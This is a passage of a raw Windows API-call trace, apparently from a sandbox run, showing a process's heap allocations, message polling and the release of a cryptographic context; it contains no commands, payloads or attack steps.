[0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0100.976] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0100.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0100.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0100.976] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0100.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0100.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0100.976] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0100.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0100.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0100.976] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0100.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0100.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0100.976] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0100.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0100.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0100.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0100.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0100.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0100.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0100.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0100.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0100.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0100.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0100.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0100.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0100.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0100.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0100.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0100.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0100.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0100.978] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0100.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0100.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0100.978] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0100.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0100.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0100.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0100.978] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0100.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0100.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0100.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0100.978] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0100.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0100.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0100.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0100.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0100.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0100.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0100.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0100.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0100.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0100.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0100.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0100.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0100.979] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0100.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0100.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0100.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0100.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0100.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0100.979] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0100.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0100.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0100.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0100.979] PeekMessageW (in: lpMsg=0x144e7a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7a4) returned 0 [0100.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0100.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0100.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0100.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0100.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0100.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0100.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0100.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0100.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0100.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0100.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0100.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0100.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0100.980] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0100.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0100.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0100.980] PeekMessageW (in: lpMsg=0x144e7a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7a4) returned 0 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0100.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0100.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0100.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0100.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0100.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0100.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0100.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0100.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0100.981] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0100.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0100.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0100.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0100.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0100.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0100.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0100.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0100.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0100.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0100.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0100.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0100.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0100.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0100.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0100.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0100.982] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0100.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0100.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0100.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0100.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0100.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0100.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0100.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0100.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0100.982] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0100.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0100.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0100.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0100.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0100.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0100.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0100.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0100.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0100.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0100.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0100.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0100.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0100.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0100.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0100.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0100.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.984] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0100.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0100.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0100.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0100.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0100.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0100.984] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.984] HeapFree (in: 